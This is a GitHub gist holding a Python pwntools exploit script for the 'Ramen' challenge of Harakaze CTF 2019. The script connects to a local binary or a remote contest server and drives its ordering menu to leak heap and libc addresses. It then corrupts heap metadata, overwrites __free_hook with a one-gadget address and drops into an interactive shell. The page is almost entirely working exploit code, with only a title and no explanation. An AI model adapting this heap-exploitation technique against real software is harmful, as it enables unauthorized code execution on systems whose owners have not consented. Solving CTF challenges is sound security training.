Skip to content

Instantly share code, notes, and snippets.

@DelspoN

DelspoN/ex.py

Created May 21, 2019 05:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save DelspoN/136779005b0988f26c4127955e06ed3f to your computer and use it in GitHub Desktop.
Save DelspoN/136779005b0988f26c4127955e06ed3f to your computer and use it in GitHub Desktop.
Download ZIP
Exploit Code for Ramen in Harakaze CTF 2019
Raw
ex.py
from pwn import *
import sys
context.log_level='DEBUG'
if len(sys.argv) == 1:
p=process('./ramen')
else:
p = remote('problem.harekaze.com', '20004')
def order(a,egg,pork,shoots,topping):
p.sendafter("Choice: ", "1")
p.sendafter("Choice: ", str(a))
p.sendafter("? ", str(egg))
p.sendafter("? ", str(pork))
p.sendafter("? ", str(shoots))
p.sendafter(": ", topping)
def serve():
p.sendafter("Choice: ", "2")
def change(size):
p.sendafter("Choice: ", "3")
p.sendafter(": ", str(size))
change(31)
order(2,1,1,1,'0000')
change(7)
for i in range(1,6):
order(2,1,1,1,str(i)*4)
for i in range(6):
serve()
change(1)
order(2,1,1,1,'5555')
change(1)
serve()
order(2,1,1,1,'3333')
change(1)
serve()
serve()
p.recvuntil('toppings: ')
leak = u64(p.recv(6).ljust(8,'\x00'))
log.info('leak = 0x%x' % leak)
change(4)
order(2,1,1,1,p64(leak+0x80+0x90)*2)
payload = p64(1)
payload += p64(0xdeadbeef)
payload = p64(leak+0x60+0xa0+0xe0+0x10)*2
order(2,1,1,1,payload)
order(2,1,1,1,payload)
serve()
serve()
serve()
p.recvuntil('toppings: ')
leak = u64(p.recv(6).ljust(8,'\x00'))
libc = leak - 0x3ebca0
free_hook = libc+0x3ed8e8
oneshot = libc + 0x4f322
log.info('leak = 0x%x' % leak)
order(2,1,1,1,p64(free_hook))
order(2,1,1,1,p64(free_hook))
order(2,1,1,1,p64(oneshot))
p.sendafter("Choice: ", "2")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment